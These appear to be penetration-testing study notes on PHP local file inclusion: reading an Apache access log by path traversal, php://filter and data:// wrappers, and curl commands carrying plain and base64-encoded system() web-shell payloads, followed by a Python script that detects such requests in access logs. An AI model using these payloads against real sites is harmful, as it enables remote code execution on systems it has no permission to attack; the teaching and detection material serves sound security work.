# Example 1 - LFI via Log Poisoning
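The `User-Agent` header is written to every Apache access-log entry, so part of the log file is client-controlled text that the file inclusion can reach.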
```bash
kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log
...
192.168.50.1 - - [12/Apr/2022:10:34:55 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 2218 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
...
```


# PHP Wrappers
- Used to bypass filters or obtain code execution via file inclusion vulnerabilities in PHP web apps.
- [https://www.php.net/manual/en/wrappers.php](https://www.php.net/manual/en/wrappers.php)
### php://filter
```bash
php://filter # include the contents of a file
# wrapper
http://example.com/wook/index.php?page=php://filter/resource=admin.php
# converts to base64
http://example.com/wook/index.php?page=php://filter/convert.base64-encode/resource=admin.php
```
### data://
- Exploitation requires the _allow_url_include_ setting to be enabled.
- Used to embed data elements as plaintext or base64-encoded data in the running web app's code.
- Offers an alternative method when we cannot poison a local file with PHP code.
```bash
data:// # achieve code execution
# wrapper
curl "http://example.com/wook/index.php?page=data://text/plain,<?php%20echo%20system('ls');?>"
# when WAF or other security mechanisms are in place
echo -n '<?php echo system($_GET["cmd"]);?>' | base64
PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==
curl "http://example.com/wook/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"
```
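
Seen from the log side, the requests in these notes leave recognisable traces. The following is an added example (not part of the original notes) that scans Apache combined-format access-log lines for traversal chains, the `php://` and `data://` wrappers, and PHP open tags in logged fields. The rule names, the `scan_line` helper and all sample lines except the first are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Apache "combined" format; quoted fields may contain backslash-escaped quotes.
Q = r'"((?:[^"\\]|\\.)*)"'
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] ' + Q + r' (\d{3}) \S+ ' + Q + ' ' + Q + r'$')

RULES = {  # hypothetical rule names, chosen for this example
    "path_traversal": re.compile(r'(?:\.\.[/\\]){2,}'),     # ../../ chains
    "php_wrapper": re.compile(r'\b(?:php|data)://', re.I),  # wrappers covered in these notes
    "php_code": re.compile(r'<\?(?:php|=)', re.I),          # PHP open tag in a logged field
}

def decode(value, rounds=3):
    """Undo repeated percent-encoding so data%3A%2F%2F is matched in clear."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return host, status and sorted 'field:rule' hits for one access-log line."""
    m = LINE_RE.match(line.strip())
    if m is None:
        # A line that no longer parses deserves a look of its own.
        return {"host": None, "status": None, "hits": ["unparsed_line"]}
    host, request, status, referer, agent = m.groups()
    fields = {"request": request, "referer": referer, "agent": agent}
    hits = sorted(f"{name}:{rule}" for name, text in fields.items()
                  for rule, rx in RULES.items() if rx.search(decode(text)))
    return {"host": host, "status": int(status), "hits": hits}

# Sample input: the first line is the benign entry from Example 1, the rest are constructed.
SAMPLE = [
    '192.168.50.1 - - [12/Apr/2022:10:34:55 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 2218 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"',
    '192.168.50.1 - - [12/Apr/2022:10:35:10 +0000] "GET /meteor/index.php?page=../../../../../../../../../var/log/apache2/access.log HTTP/1.1" 200 2512 "-" "curl/7.74.0"',
    '192.168.50.1 - - [12/Apr/2022:10:36:02 +0000] "GET /meteor/index.php?page=php://filter/convert.base64-encode/resource=admin.php HTTP/1.1" 200 3012 "-" "curl/7.74.0"',
    '192.168.50.1 - - [12/Apr/2022:10:37:41 +0000] "GET /meteor/index.php?page=data%3A%2F%2Ftext/plain;base64,AAAA HTTP/1.1" 200 2218 "-" "curl/7.74.0"',
    '192.168.50.1 - - [12/Apr/2022:10:38:19 +0000] "GET /meteor/index.php?page=admin.php HTTP/1.1" 200 2218 "-" "Mozilla/5.0 <?php /* constructed placeholder */ ?>"',
]

if __name__ == "__main__":
    for entry in SAMPLE:
        print(scan_line(entry))
```

The `agent:php_code` hit is the log-poisoning precursor: it fires when the PHP tag is written to the log, before any request tries to include the file.
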
### Wordlists
- [https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/LFI/LFI-Jhaddix.txt)